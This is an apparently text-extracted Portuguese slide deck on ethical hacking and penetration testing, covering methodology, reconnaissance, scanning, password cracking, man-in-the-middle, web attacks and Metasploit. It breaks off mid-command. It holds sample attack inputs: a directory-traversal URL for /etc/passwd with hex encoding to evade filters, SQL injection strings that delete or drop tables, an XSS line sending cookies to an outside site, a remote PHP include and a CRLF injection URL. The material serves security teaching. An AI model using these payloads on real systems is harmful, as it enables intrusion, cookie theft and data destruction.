Baixe o app para aproveitar ainda mais
Prévia do material em texto
Ethical Hacking Marcos Flávio Araújo Assunção Certified Ethical Hacker mflavio@defhack.com www.defhack.com.br Apresentação do palestrante Marcos Flávio Araújo Assunção Formação Mestrando em Sistemas de Informação, Universidade Fumec. Especialista em Docência para o Ensino Técnico Superior, Senac Minas. Especialista em Redes de Computadores, ESAB. Vitória, ES. Tecnólogo em Engenharia de Software, UNATEC. Belo Horizonte, MG. Marcos Flávio Araújo Assunção Atuação profissional Professor do Senac Minas e do Centro Universitário UNA Fundador da empresa DefHack Tecnologia (www.defhack.com.br). Palestrante e Keynote em seminários sobre Ethical Hacking Certified Ethical Hacker pelo EC-COUNCIL Autor de 9 livros sobre Hacking e Segurança Marcos Flávio Araújo Assunção Publicações Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético 1ª ,2ª, 3ª, 4ª e 5ª Edições Honeypots e Honeynets Wireless Hacking Marcos Flávio Araújo Assunção Publicações Marcos Flávio Araújo Assunção Treinamentos em Ethical Hacking – Desde 1999 Marcos Flávio Araújo Assunção Keynote em eventos de Ethical Hacking – Lisboa 2006 Marcos Flávio Araújo Assunção Keynote em eventos de Ethical Hacking – Lisboa 2008 Marcos Flávio Araújo Assunção Keynote em eventos de Ethical Hacking – Maputo 2014 Marcos Flávio Araújo Assunção Certificações Certified Ethical Hacker Cisco Certified CCNA Instructor Trainer (ITQ) Marcos Flávio Araújo Assunção Citações Profissionais ( 2003 ) EUA. The New York Times, “Brazil Becomes a cybercrime lab”. Por Tony Smith ( 2007 ) Portugal. GQ Portugal, “Hacker Ético”, por Miguel dos Santos ( 2008) Reino Unido. McMafia, “Code Orange”, Por Misha Glenny Marcos Flávio Araújo Assunção Valhala Honeypot -Detecção de Intrusos - Pote de mel -Grátis - Totalmente em português - Mais de 30 mil usuários Projetos www.superdownloads.com.br Marcos Flávio Araújo Assunção Segurança? Isso existe? Conheces teu inimigo e conhece-te a ti mesmo; se tiveres cem combates a travar, cem vezes serás vitorioso – Sun Tzu Marcos Flávio Araújo Assunção Por que não estamos seguros? Configurações malfeitas Softwares com falhas Redes desprotegidas Proteções ineficazes Falta de atualizações Fator humano Vulnerabilidade Marcos Flávio Araújo Assunção 62milsenhas-lulzsec Marcos Flávio Araújo Assunção 220 sites fora hackeados - jusbrasil Marcos Flávio Araújo Assunção Segurança por obscuridade Segurança Passiva - Semi-automática - Desatualizada - Pouco eficiente Segurança Ativa - Manual - Bastante atualizada - Alta eficiência Por que usar senhas complexas? Marcos Flávio Araújo Assunção Tipos de “Hackers” Black Hat (Cracker) White Hat (Ethical Hacker) Gray Hat (indeciso) Marcos Flávio Araújo Assunção Crackers famosos Marcos Flávio Araújo Assunção 414s • Década de 80 • Invadiram Security Pacific Bank e Alamos National Laboratory • Primeiro caso famoso na mídia • Contribuiu para aprovação de leis contra hacking Marcos Flávio Araújo Assunção John Draper • Década de 70 • Captain Crunch • Apito • Phreaking •Recentemente: - Empresário - Firewall CrunchBox Marcos Flávio Araújo Assunção Robert Morris Jr. • Ano de 1988 • Primeiro Worm • MIT • Derrubou 6 mil computadores • Recentemente: - Empresário - ViaWeb (Yahoo Store) - Y Combinator Marcos Flávio Araújo Assunção Kevin Poulsen • Década de 80 • KIIS-FM e o Porsche 944 • 51 meses de prisão • Recentemente: - Jornalista - SecurityFocus Marcos Flávio Araújo Assunção Kevin Mitnick • Década de 90 • Invadiu Sun, Nokia, Motorola e outras • Free Kevin • Takedown • Atualmente: - Empresário e autor - Defensive Thinking - A arte de enganar Marcos Flávio Araújo Assunção Adrian Lamo • Década de 2000 • Invadiu NYT, Microsoft e outros • Capturado em 2003 e julgado em 2004 • Libertado em 2006 • Recentemente - Analista freelancer - “Can you hack it” Marcos Flávio Araújo Assunção Adrian, Mitnick e Poulsen • Foram presos • Se tornaram famosos • Trabalham atualmente com segurança • São minoria Marcos Flávio Araújo Assunção O Hacker Ético é uma necessidade do mercado ou apenas uma “frescura” adolescente? Marcos Flávio Araújo Assunção MCT convida movimento Hacker brasilgov Marcos Flávio Araújo Assunção Precisa-se de Hackers experientes estadominas-online Marcos Flávio Araújo Assunção Governo americano recruta hackers globodigital Marcos Flávio Araújo Assunção Hacker Ético, um aliado na segurança. hojeemdia Marcos Flávio Araújo Assunção Hacker Ético na mira das empresas infoexame Marcos Flávio Araújo Assunção Cresce a busca pelo Hacker Ético jornal-o-globo Marcos Flávio Araújo Assunção Hackers tem o apoio oficial do MCT olhardigital Marcos Flávio Araújo Assunção Governo federal contratará Hackers profissionaisti Marcos Flávio Araújo Assunção Forbes – Hacker Ético é uma das principais carreiras do futuro Marcos Flávio Araújo Assunção O papel do Hacker Ético – O que é um Penetration Test? Marcos Flávio Araújo Assunção Você usaria um produto que nunca foi testado na prática? capacete-destruído Marcos Flávio Araújo Assunção Teste de “stress” – Uma necessidade real capacete-moto Marcos Flávio Araújo Assunção Teste de “stress” - Pressão capacete Marcos Flávio Araújo Assunção Teste de “stress” - Temperatura flame-test-helmet Marcos Flávio Araújo Assunção Penetration Test (Teste de Invasão) Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas É a principal ferramenta de um Hacker Ético Abordado pelo CEH (Certified Ethical Hacking) “Invadir para proteger” Marcos Flávio Araújo Assunção Certificação de Hackers Éticos eccouncil Marcos Flávio Araújo Assunção Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. É neste nível que são “graduados” os profissionais CEH (Certified Ethical Hackers) Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda utiliza muitos recursos já “prontos” (como o Metasploit) para acelerar o processo de teste das vulnerabilidades. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. O Google por exemplo costuma dar prêmios a quem descobre falhas no Chrome. Marcos Flávio Araújo Assunção Tipos de Penetration Test Black BoxWhite Box Gray Box Marcos Flávio Araújo Assunção Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa. Marcos Flávio Araújo Assunção Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc. Marcos Flávio Araújo Assunção White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc. Marcos Flávio Araújo Assunção Quando se utilizar de um PenTest? “Quebrar” ao invés de “rastrear” PenTest x Perícia Forense Caso : HD do Daniel Dantas Marcos Flávio Araújo Assunção Metodologias de Penetration Test Marcos Flávio Araújo Assunção Metodologias de Penetration Test O que é uma metodologia de PenTest? Por que devemos seguir uma metodologia? Vantagens e desvantagens Marcos Flávio Araújo Assunção Metodologias de Penetration Test OSSTMM ○ http://www.isecom.org/osstmm/ ISSAF ○ http://www.oissg.org/issaf Marcos Flávio Araújo Assunção OSSTMM Metodologia mais popular Os testes são discutidos em um alto nível Inclui tecnologias únicas (RFID, infravermelho) Não se baseia fortemente em ferramentas BackTrack se baseia nessa metodologia OSSTMM (Open Source Security Testing Methodology Manual) Marcos Flávio Araújo Assunção OSSTMM Vantagens Maior flexibilidade para PenTesters Atualizações frequentes Desvantagens Maior curva de aprendizado • Conhecimento de ferramentas e Sistemas Operacionais necessários como pré-requisito Versões mais novas requerem pagamento OSSTMM Marcos Flávio Araújo Assunção ISSAF (Information Systems Security Assessment Framework) Contém dois documentos separados Gerenciamento (ISSAF0.2.1A) Penetration Testing (ISSAF0.2.1B) Checklists para Auditoria / Proteção de Sistemas Centrado em ferramentas Marcos Flávio Araújo Assunção Vantagens ○ Não exige conhecimento prévio de ferramentas e sistemas operacionais ○ Fornece exemplo do uso de ferramentas de PenTest Desvantagens ○ Rapidamente desatualizado ○ Exemplos de ferramentas de PenTest não são extensivos ISSAF Marcos Flávio Araújo Assunção O ISSAF é constituído de 5 fases: Fase I – Planejamento Fase II – Análise Fase III – Tratamento Fase IV – Resultados Fase V – Manutenção Fases do ISSAF Marcos Flávio Araújo Assunção Fases de um Penetration Test Marcos Flávio Araújo Assunção Fases de um PenTest (Ataque) Marcos Flávio Araújo Assunção Vulnerabilidades Categorias Configuração Redes Dispositivos móveis Software Malware Físicas Humanas Tipo • Cliente • Servidor Atuação • Local • Remota Meio • Informática • Telefone / outros Marcos Flávio Araújo Assunção Etapas técnicas de um PenTest Marcos Flávio Araújo Assunção FootPrinting Marcos Flávio Araújo Assunção Pesquisa inicial (FootPrinting) Pesquisa geral Ping e traceroute Sites de emprego Whois (internic e arin) DNS Zone Transfer Google Archive.Org Mail Tracking Marcos Flávio Araújo Assunção Ping e traceroute Permitem descobrir informações como: - IP e nome de servidores e roteadores intermediários - Se há bloqueio de firewalls filtro de pacote Marcos Flávio Araújo Assunção Pesquisando sites de emprego Vagas de emprego frequentemente revelam mais do que deveriam sobre a estrutura de TI de uma empresa Marcos Flávio Araújo Assunção Whois – Pesquisando domínios Permite descobrir informações sobre um domínio Vários sites podem ser usados. Exemplo: registro.br e internic.net Marcos Flávio Araújo Assunção Whois – Pesquisando IPs ARIN.NET Permite descobrir o range de endereços IP de uma rede pública Marcos Flávio Araújo Assunção DNS Zone Transfer Transfere zonas de servidores DNS secundários vulneráveis Pode usar o dig ou o nslookup Exemplo (nslookup): server ns2.empresa.com set type=ANY ls –d empresa.com Marcos Flávio Araújo Assunção Google Hacking Descobrir informações pelo google usando comandos como site, filetype, inurl e index of, entre outros. Marcos Flávio Araújo Assunção Archive.Org – WayBack Machine Permite visualizar versões passadas de qualquer website já criado desde o surgimento da WEB. Extremamente útil para ver a evolução de uma empresa Mostra o “ano” de quando o site foi criado. Isso é muito relevante pois podemos saber quando a empresa começou a atuar. Outra vantagem: poder “rever” o conteúdo de um site que já saiu do ar. Marcos Flávio Araújo Assunção Archive.Org – WayBack Machine Marcos Flávio Araújo Assunção Mail Tracking Mail Tracking é um serviço extremamente útil, que permite monitorar os e-mails que você envia para saber se o destinatário leu a mensagem, o horário que isto aconteceu – e o mais importante – o endereço IP do sistema que destinatário estava utilizando no momento. Marcos Flávio Araújo Assunção Mail Tracking Basta se cadastrar no site e mandar o seu e-mail com “mailtracking.com” no final da mensagem. Exemplo: fulano@empresa.com.br.mailtracking.com . Assim que o destinatário abrir a mensagem, logue no mailtracking e veja os dados capturados: Marcos Flávio Araújo Assunção Varredura e Enumeração Marcos Flávio Araújo Assunção Etapas da Varredura Varredura de hosts (endereços IP) na rede Varredura de portas (serviços ativos) Marcos Flávio Araújo Assunção Varredura de IPs Tem como objetivo descobrir as máquinas ativas da rede Ping Sweep UDP Scan Softwares: ping, hping3, nmap (- sV), superscan, etc. Marcos Flávio Araújo Assunção Varredura de portas Tem como objetivo identificar os serviços ativos no sistema Softwares usados: NMAP, Superscan, etc. Tipos de varredura: Full, Half-Syn, FIN, ACK, XMAS, NULL, UDP, etc. Marcos Flávio Araújo Assunção Enumeração Tem como objetivo identificar os serviços rodando nas portas e o sistema operacional do alvo Captura de banners Fingerprint Sessão Nula (old!) Regras de Firewall Marcos Flávio Araújo Assunção Captura de Banners Basta se conectar ao serviço usando telnet Muitos serviços não são configurados para alterar o banner padrão Mostra o nome e a versão do software Informação pouco confiável Marcos Flávio Araújo Assunção Fingerprint Usa um banco de dados de “impressões digitais” para identificar o serviço Baseia-se na análise do comportamento de pacotes Marcos Flávio Araújo Assunção Fingerprint com o NMAP Sistema Operacional: (opção –O)) Serviços das portas: (opção –A)) Marcos Flávio Araújo Assunção Vulnerabilidades de Senhas Marcos Flávio Araújo Assunção Autenticação por senhas Senhas fracas Bloqueio por tentativas “Tentativa e erro” Força-Bruta local (eficiente) Força-Bruta remota (não tão eficiente) Wordlists (dicionários) Rainbow Tables Marcos Flávio Araújo Assunção Força-Bruta remota - xHydra Muito usado em sistemas Linux. Permite força- bruta em diversos protocolos de aplicação: HTTP, FTP, SQL, VNC e muito mais. Entretanto, somente trabalha com wordlists. Marcos Flávio Araújo Assunção Força-Bruta remota - Brutus Para sistemas Windows Mais limitado e com suporte a menos protocolos que o XHydra Entretanto, trabalha com “bruteforce real” ao invés de somente wordlists Marcos Flávio Araújo Assunção Força-Bruta local - Cain Para sistemas Windows Permite tentar descobrir localmente diversos tipos de hash Tem suporte a, entre outros: LM, NTLM, MD5, SHA-1, WPA1, etc. Marcos Flávio Araújo Assunção Força-Bruta local - Cain Marcos Flávio Araújo Assunção Rainbow Tables São “tabelas” que podem ser geradas ou baixadas da Internet Visam “acelerar” o processo de força-bruta local ao pesquisar hashes já descobertos O WINRTGEN permite gerar suas próprias RTs Marcos Flávio Araújo Assunção Rainbow Tables Online Muitos sites oferecem o serviço de rainbow tables online Isso permite que você quebre diversos tipos de hash em questão de segundos Sites: Online Hash Crack e CrackStation, entre outros. Marcos Flávio Araújo Assunção Vulnerabilidades de Rede Marcos Flávio Araújo Assunção Vulnerabilidades de rede Podemos dizer que as vulnerabilidades de rede mais comuns são: Farejamento (sniffing) Redirecionamento de tráfego Spoofing Hijacking Man in the middle Marcos Flávio Araújo Assunção Farejamento de tráfego Sniffers Modo promíscuo Dados sem criptografia Passivo Capturando senhas Limitado Marcos Flávio Araújo Assunção Redirecionamento de tráfego Sniffing ativo Farejar tráfego de outros dispositivos Redirecionar o tráfego para o ponto desejado ARP Poisoning ICMP redirect DHCP Spoofing Port Stealing Marcos Flávio Araújo Assunção Arp Poisoning VLANs Address Resolution Protocol (ARP) Cache ARP Dinâmico x Estático Port Security não protege contra isto. Marcos Flávio Araújo Assunção ICMP Redirect Outro método interessante ICMP Type 5 Redirect “Sou a melhor rota” Bom para redirecionar tráfego de roteadores Marcos Flávio Araújo Assunção DHCP Spoofing Spoof = falso Servidor DHCP Atribui endereços antes do verdadeiro servidor Condição de corrida Marcos Flávio Araújo Assunção Port Stealing Nível de enlace Portas do Switch Ethernet frames Spoofing/Poisoning Permite capturar o tráfego de VLANs mal configuradas ao se passar por um tronco (802.1d trunk) Marcos Flávio Araújo Assunção Man in The Middle Colocando-se no meio da transação Marcos Flávio Araújo Assunção Man in the Middle No “meio” da transmissão Sessão dupla Local (ARP) Remoto (Proxy) Tráfego criptografado Marcos Flávio Araújo Assunção MITM – Lado Cliente Ponta Cliente Inicia a conexão Responsável por dados de autenticação, como senhas e cookies de sessão Autenticação alterada “on the fly” Marcos Flávio Araújo Assunção MITM – Lado Servidor Ponta servidor Responde às solicitações da conexão cliente Diz se o cliente está autenticado ou não Manipulação de html “Entre novamente com a senha” Marcos Flávio Araújo Assunção Como é possível o MITM? Interceptação do certificado “real” do servidor verdadeiro Chaves Certificado Digital “falso” enviado ao cliente Conexão dupla criptografada O browser reclama, mas não impede na maioria dos casos Os avisos do browser podem ser removidos por outras técnicas Marcos Flávio Araújo Assunção Alguns protocolos suportados pelo MITM Secure Socket Layer (SSL) Secure Shell (SSHv1) Remote Desktop Protocol (RDP) Marcos Flávio Araújo Assunção Softwares de rede local para MITM Marcos Flávio Araújo Assunção CAIN Plataforma: Windows Redirecionamento arp poisoning O mais simples de se utilizar MITM de RDP MITM de DNS Gera os certificados automaticamente Marcos Flávio Araújo Assunção DSniff Plataforma: Linux Redirecionamento : Arp poisoning arpspoof macof webmitm sslmitm Marcos Flávio Araújo Assunção Ettercap Plataforma: Linux e Windows Redirecionamento : Arp Poisoning, Port Stealing, ICMP Redirect e DHCP Spoofing Pode sequestrar a sessão Possui diversos plug- ins Marcos Flávio Araújo Assunção SSL Strip Apresentado na BlackHat de 2009 pelo criador do SSLSniff Utiliza novas técnicas de hijacking para capturar novas sessões http/https Não depende de aguardar redirect 301/302 Mais eficiente que o ettercap e o Cain Marcos Flávio Araújo Assunção SSL Strip Marcos Flávio Araújo Assunção Passos necessários para o SSL Strip funcionar: - IP Forward - Port redirect - ARP spoofing (poisoning) Softwares Proxy para MITM Marcos Flávio Araújo Assunção Achilles Plataforma: Windows Proof of concept Lento Muitos erros Não separa os dados nas conexões Permite alteração limitada “on the fly” Marcos Flávio Araújo Assunção Achilles Senha capturada por MITM de uma conexão HTTPS. Note que a janela é dos dados provenientes do lado cliente. Marcos Flávio Araújo Assunção Paros Proxy Plataforma: Java Virtual Machine Muitos recursos Mais rápido Separa os dados em diversas “pastas” Permite filtro para alteração “on the fly” - Ex: “senha” Marcos Flávio Araújo Assunção Spoofing e Hijacking Marcos Flávio Araújo Assunção Spoofing Informações falsas Autenticação Cliente não precisa estar online ARP Spoofing DNS Spoofing IP Spoofing MAC Spoofing Marcos Flávio Araújo Assunção Tipos de IP Spoofing Blind IP Spoofing É o spoof “cego”. Acontece quando você envia o pacote com o IP de origem falsificado, mas como o destino está em outra rede você não consegue farejar e ver a resposta.: Non-Blind IP Spoofing Neste caso, você está na mesma LAN (e na mesma VLAN) da máquina de destino a qual você mandou o pacote spoofado. Então, farejando o trafégo com o wireshark ou outro sniffer você consegue visualiazr a “resposta”.Marcos Flávio Araújo Assunção Non-Blind IP Spoofing com STERM: Marcos Flávio Araújo Assunção Non-Blind IP Spoofing com STERM: Marcos Flávio Araújo Assunção DNS Spoofing É um dos tipos mais perigosos Permite enviar respostas “falsas” de consultas DNS a um cliente. Pode ser facilmente realizado pelo Cain ou Ettercap se há redirecionamento de tráfego Marcos Flávio Araújo Assunção DNS Spoofing com CAIN Marcos Flávio Araújo Assunção Hijacking Sequestro de sessões Números de sequência Necessita do cliente online Ack Storm Retransmissão Marcos Flávio Araújo Assunção Hijacking Usando firesheep para capturar cookies http e sequestrar sessões Marcos Flávio Araújo Assunção Vulnerabilidades de Servidores e Aplicações WEB Marcos Flávio Araújo Assunção Enganos de Segurança O Firewall protege meu servidor web e meu banco de dados Acesso à porta 80 e 443 do seu servidor Web faz parte do seu perímetro de defesa externo Vulnerabilidades no servidor Web ou em aplicações web podem levar à um acesso interno da rede… passando pelo firewall. Marcos Flávio Araújo Assunção Enganos de Segurança (cont.) O IDS protege meu servidor Web e meu banco de dados O IDS é configurado para detectar assinaturas de ataques bem conhecidos Essas assinaturas não incluem as feitas contra aplicações customizadas Marcos Flávio Araújo Assunção Enganos de Segurança (cont.) SSL protege meu site SSL protege o transporte de dados entre o servidor web e o browser do usuário SSL não protege contra ataques destinados ao cliente ou à aplicação SSL é o melhor amigo dos hackers devido ao falso senso de segurança (vide ataques de MITM) Marcos Flávio Araújo Assunção Falhas clássicas em Servidores Web Marcos Flávio Araújo Assunção Buffer Overflow Exploração de falhas muito utilizada ainda hoje Dados de entrada > buffer (- tratamento) IIS Apache Shell remoto ou outro payload Acesso à rede interna Também acontece com aplicações web Marcos Flávio Araújo Assunção Injeção de comandos em Hexa Codificando em hexa as strings das URLs, pode ser possível burlar filtros de segurança e IDS. http://www.site.com/cgi?arquivo=/etc/passwd Pode ficar assim: http://www.site.com/cgi?arquivo=/%2F%65%74%63 %2F%70%61%73%73%77%64 Marcos Flávio Araújo Assunção Codificação dupla em hexa Primeira: scripts/..%255c../winnt se torna: scripts/..%5c../winnt (%25 = caractere “%”) Segunda: scripts/..%5c../winnt se torna: scripts/..\../winnt Travessia de diretórios agora é possível utilizando codificação dupla em hexa. Marcos Flávio Araújo Assunção Barra em Unicode Em unicode, “%c0%af”, é o equivalente à barra (“/”). Então, um exploração ficaria: scripts/..%c0%af../winnt E seria convertido para: scripts/../../winnt Travessia de diretórios também é possível usando ofuscação através do Unicode Marcos Flávio Araújo Assunção Falhas em Aplicações Web Marcos Flávio Araújo Assunção Entrada maliciosa - Injection Problema muito comum Filtro malfeito Lado servidor SQL Injection ‘’ or’=‘ ‘ 1 = 1 -- Marcos Flávio Araújo Assunção Saída maliciosa - XSS Mesmo princípio do injection Tipo cliente Utilizado normalmente para captura de cookies Marcos Flávio Araújo Assunção Problemas comuns Algoritmo fraco – Muitos sites web hoje estão usando algoritmos lineares baseados em variáveis previsíveis, como tempo ou endereço IP. Sem bloqueio de conta – Pode ser feito ataques de força-bruta na ID de sessão sem que o servidor web reclame. Expiração indefinida – Se a sessão não expira facilmente, o invasor tem tempo quase ilimitado para tentar descobrir o ID. Marcos Flávio Araújo Assunção IDs em Campos Ocultos <FORM METHOD=POST ACTION="/cgi- bin/access.cgi"> <input type="hidden" name="sessionID" value=”abc123”> <input type="hidden" name=“usuario" value=”Carol”> <input type="submit" name=“Logar no sistema"></form> Marcos Flávio Araújo Assunção Cross Site Scripting (XSS) Atacante injeta scripts (JavaScript) no browser O código é executado pelo browser para realizar alguma ação Muito usado para roubar cookies Funciona geralmente no lado cliente Marcos Flávio Araújo Assunção Cross-Site Request Forgeries (CSRF) Evolução do Cross Site Scripting Usar POST em vez de GET Forçar o uso de forms próprios via TOKEN aleatório Mais difícil de impedir que XSS [img]http://seuforum.com/novaresposta.php?action=newthr ead&subject=teste&body=alguma+coisa+aqui&submit=go[ /img] Marcos Flávio Araújo Assunção CRLF Injection Carrier Return and Line Feed (CRLF) Caracteres especiais que representam o “fim da linha” (end of line – EOL) O servidor “verdadeiro” gera o código HTML, o que torna o ataque perigoso. Exemplo: http://www.seusite.com.br/somepage.php?page=%0d%0aContent- Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent- Type: text/html%0d%0a%0d%0a%3Chtml%3EConteúdo Hacker%3C/html%3E O usuário verá uma página com os dizeres “Conteúdo Hacker” escrito na mesma. Marcos Flávio Araújo Assunção Explorando Filtros malfeitos Marcos Flávio Araújo Assunção PHP Injection Includes mal configurados permitem que outro script remoto seja executado Isso permite que você execute programas no sistema, obtenha arquivos, etc. <? include "$file.inc"; //include “http://attack.com/script.inc"; ?> script.php?file=http://site.com/script <? system("ls $cmd"); //system("ls -la | wall bom dia"); ?> script.php?cmd=-la | wall bom dia Marcos Flávio Araújo Assunção Exemplos de XSS <script> alert(‘Oi’!) </script> <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script> <a href=“javascript#[código]> <div style=“behaviour: url([código]);”> <body onload=“[código]”> <img src=“javascript:[código]”> Marcos Flávio Araújo Assunção SQL Injection SQL Injection é um ataque de injeção de comandos causado por uma entrada de dados não validada corretamente O atacante inclui uma entrada maliciosa com a intenção de alterar a consulta ao banco de dados realizada Funciona apenas no lado servidor Marcos Flávio Araújo Assunção Métodos do SQL Injection O SQL Injection pode ser utilizado com dois métodos do HTTP: GET – Nesse método a inserção dos comandos SQL é realizada diretamente na URL do site. Exemplo: GET /usuarios.asp?sobrenome=assuncao’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 POST – Nesse método a inserção dos comandos SQL é feita nos campos de um formulário. Exemplo: ‘’ OR ‘=‘ Marcos Flávio Araújo Assunção Tipos de SQL Injection Existem dois tipos básicos de SQL Injection Error Based SQL Injection – O atacante detecta que o website é vulnerável devido a erros de SQL mostrados na tela, usando-os também para guiar o ataque. Blind SQL Injection – O site é vulnerável a SQL Injection mas não apresenta nenhum tipo de erro ao atacante, o que torna mais difícil de detectar a falha. Marcos Flávio Araújo Assunção Error Based SQL Injection (POST) Marcos Flávio Araújo Assunção Error Based SQL Injection (POST) Marcos Flávio Araújo Assunção SQL Injection:Exemplo normal 1 GET /view_account.cfm?acct_id=10 HTTP/1.1 SELECT * FROM accounts WHERE acct_id = 10 Marcos Flávio Araújo Assunção SQL Injection : Exemplo injeção 1 GET /view_account.cfm?acct_id=10 OR 1=1 HTTP/1.1 SELECT * FROM accounts WHERE acct_id = 28 OR 1=1 -- Marcos Flávio Araújo Assunção SQL Injection: Exemplo normal 2 GET /user_lookup.cfm?lastname=assuncao HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’ Marcos Flávio Araújo Assunção SQL Injection: Exemplo injeção 2 GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’ Marcos Flávio Araújo Assunção SQL Injection - Dicas acct_id=10 OR 1 = ‘1’ Tente várias cláusulas OR usando <>, >, >=, LIKE, etc. Use comandos para acabar prematuramente com uma consulta SELECT * FROM users WHERE user_id = 1-- AND password=‘minhasenha’ Enumerar informação do banco de dados acct_id=10 UNION SELECT name [,1,2,…] FROM objetos WHERE xtype=‘U’ acct_id=10 UNION SELECT [colunas] FROM [tabela] UNION requer que ambos os pedidos compartilhem um número comum de colunas, acrescentando colunas quando requerido Marcos Flávio Araújo Assunção SQL Injection – Automatização Alguns softwares de vulnerabilidade permitem detectar erros de SQL automaticamente. Alguns exemplos: Nessus SQLFinder Acunetix WVS Existem até alguns programas que podem explorar automaticamente o SQL Injection, automatizando o processo. Exemplos: Havij SQL Ninja Fast-Track Metasploit Marcos Flávio Araújo Assunção Exemplo: Havij (SQL Injection GET) Marcos Flávio Araújo Assunção Exemplo: Havij (Online Crack MD5) Marcos Flávio Araújo Assunção SQL Injection: Indo além Concatene múltiplos comandos acct_id=28; DROP TABLE Users; Procedimentos úteis xp_msver xp_cmdshell [command] -> PERIGO! xp_servicecontrol [action] [service] Marcos Flávio Araújo Assunção Exemplo xp_cmdshell Marcos Flávio Araújo Assunção Exemplo xp_cmdshell Marcos Flávio Araújo Assunção Considerações sobre o SQL Server O SQL Server vem por padrão com o usuário ‘sa’ (system administrator). Muitos administradores não colocam senhas muito complexas para este usuário O BackTrack possui várias ferramentas para tentar fazer força bruta na conta sa e, caso a senha seja descoberta, pode-se executar o xp_cmdshell sem precisar de SQL Injection. Marcos Flávio Araújo Assunção Vulnerabilidades de Software – Exploração de falhas Marcos Flávio Araújo Assunção Objetivos da exploração de falhas Falhas remotas – Ganhar acesso não autorizado ao sistema alvo (normalmente ao shell) ou causar Denial of Service Falhas locais – Elevar os privilégios de acesso para root/system ou causar Denial of Service Normalmente um atacante irá explorar uma falha remota para invadir um sistema e loco depois tentará a elevação de privilégios. O motivo para isto é que a maioria dos serviços hoje rodam no perfil de usuários com poucos privilégios como o nobody/guest. Marcos Flávio Araújo Assunção Tipos de falhas Stack overflow Heap overflow Heap Spraying Memory Corruption String format Race conditions Privilege Escalation Marcos Flávio Araújo Assunção Pesquisa manual por Falhas - SecurityFocus Marcos Flávio Araújo Assunção Scanners “genéricos” de vulnerabilidades Não se focam em um serviço específico. São como um médico generalista, detectam “superficialmente” problemas em vários protocolos. Exemplos de softwares: Nessus, Retina, Languard, Shadow Security Scanner Boa opção para uma grande rede corporativa Marcos Flávio Araújo Assunção Scanners “especialistas” de vulnerabilidades Focam em poucos protocolos e serviços (normalmente apenas um), por isso fazem uma análise mais apurada. Há muitos scanners destes para http, sql, etc. Exemplos de softwares: Nikto, SQLMap, SQL Ninja, Acunetix, W3AF, etc. Marcos Flávio Araújo Assunção Descobrindo novas falhas – Zero Day Debugger / dissambler Fuzzing Registradores ESP (Stack Pointer) EBP (Base ponter) EIP (Instruction pointer) Breakpoints NOP Slide Payload Exploit Marcos Flávio Araújo Assunção Metasploit Framework • Criado por HD Moore, é hoje o framework de exploração de falhas mais utilizado. • Extremamente customizável • Atualizações frequentes • Possibilidade de criação de scripts • Muitas opções de payloads • Métodos para se burlar firewalls e anti-vírus • Meterpreter • Interface console, gui e web Marcos Flávio Araújo Assunção MetaSploit Framework •Framework de testes • Objetivo • Metodologia blackbox • Explora Bugs através de exploits Ex: Buffer Overflows Marcos Flávio Araújo Assunção Metasploit Framework Selecionar exploit Selecionar alvo Selecionar Payload Aguardar resultado Acessar shell remoto Marcos Flávio Araújo Assunção Metasploit – Suíte completa O Metasploit Framework (MSF) vem com muitos utilitários para auxiliar na realização da exploração. Vamos estudar os principais: msfconsole, msfcli, msfpayload e msfencode. Marcos Flávio Araújo Assunção Variáveis do Metasploit São usadas em todos os comandos do MSF. Ex: msfconsole, msfcli, msfpayload, etc. As principais são: • LHOST -> IP local • LPORT -> Porta local • RHOST -> IP remoto • PAYLOAD -> Tipo de payload • TARGET -> Tipo de alvo Marcos Flávio Araújo Assunção Msfconsole Método mais utilizado para uso do MSF. É um console que permite escolher interativamente exploits, utilitários, payloads e configurar as devidas variáveis. Marcos Flávio Araújo Assunção Comandos do MSFCONSOLE • search <nome> -> Pesquisa módulo de exploit • use <nome> -> Utiliza módulo de exploit • show <argumento> -> Mostra informações referentes ao módulo. O argumento pode ser: exploits, options, payloads ou auxiliares. • set <variável> -> Configura um valor em uma variável. Ex: LHOST, LPORT, PAYLOAD, etc. • unset <variável> -> “Desconfigura” uma variável. • exploit -> Realiza a exploração após as variáveis terem sido configuradas. Marcos Flávio Araújo Assunção MSFConsole – Exemplo search search ms12 Marcos Flávio Araújo Assunção MSFConsole – Exemplo use use exploit/windows/smb/ms08_06_netapi Marcos Flávio Araújo Assunção MSFConsole – Exemplo show show payloads Marcos Flávio Araújo Assunção MSFConsole – Exemplo set set LHOST 